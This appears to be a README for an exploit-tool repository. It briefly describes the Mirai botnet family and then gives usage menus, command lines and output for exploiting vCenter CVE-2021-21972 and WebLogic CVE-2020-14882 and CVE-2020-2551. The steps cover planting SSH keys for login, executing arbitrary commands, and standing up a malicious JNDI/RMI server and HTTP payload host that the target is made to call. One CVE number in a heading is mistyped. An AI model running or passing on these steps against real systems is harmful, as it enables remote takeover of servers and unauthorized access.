# Descriptions of malware included in these repos:

## `Mirai` 

(cloudflare- infects smart devices that run on ARC processors)A malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large scale networking attacks. Primarily targets online consumer devices such as IP cameras and home routers.  
  * Okiru
  * Satori
  * Masuta
  * PureMasuta

## `CVE-2021-21972` 

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).

### Menu

```
 % python3 CVE-2021-21972.py -h
Usage: CVE-2021-21972.py [options]

Options:
  -h, --help         show this help message and exit
  -i FILE            file containing list of urls
  -u URL, --url=URL  https://1.1.1.1
  -f FILENAME        
  -n NOOFTHREADS     
  -e, --exploit      
  -c, --check        
% 
```

### Steps:

```
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS
Login using 'ssh -i id_rsa vsphere-ui@x.x.x.x'
```

```
% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
```

```
% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972
```

## `CVE-2020-14882`

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic

### Steps: 

```
% python3 CVE-2020-14882.py -u http://172.16.164.134:7001 -c 'uname -r > /tmp/success' -i 172.16.164.1
[*] http://172.16.164.134:7001/console/login/LoginForm.jsp [version 12.1.3.0.0]
[*] Using: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
172.16.164.134 - - [25/Feb/2021 20:55:36] "GET /test.xml); HTTP/1.1" 200 -
```

```
% python3 CVE-2020-14882.py -u http://127.0.0.1:7001 -c 'uname -r' -i 172.16.164.1
http://127.0.0.1:7001/console/login/LoginForm.jsp
[*] http://127.0.0.1:7001/console/login/LoginForm.jsp [version 12.2.1.3.0]
[*] Using: com.tangosol.coherence.mvel2.sh.ShellSession
Linux 96fc5d43736b 4.19.121-linuxkit #1 SMP Tue Dec 1 17:50:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```

## `CVE-220-2551`

A remote code execution vulnerability was found in Oracle Weblogic Server. A remote, unauthenticated attacker could exploit this vulnerability and cause a remote IIOP server to initialize a Java object that invokes a JNDI lookup to a remote, attacker-controlled server. A malicious JNDI lookup will result in code execution.

### Steps:

```
# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt-install ant
$ cd /tmp
$ wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true -o marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make
```

Dump and Import SSL Certificate
If you are targeting Weblogic server (x.x.x.x:7002) (iiops), run the below commands. Replace 172.16.164.2 with the correct IP address.
If you are targeting Weblogic server (x.x.x.x:7001) (iiop), skip this step

```
$ echo -n | openssl s_client -connect 172.16.164.2:7002 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.133.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit
```

Run each of the commands in different terminal

```
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp

```
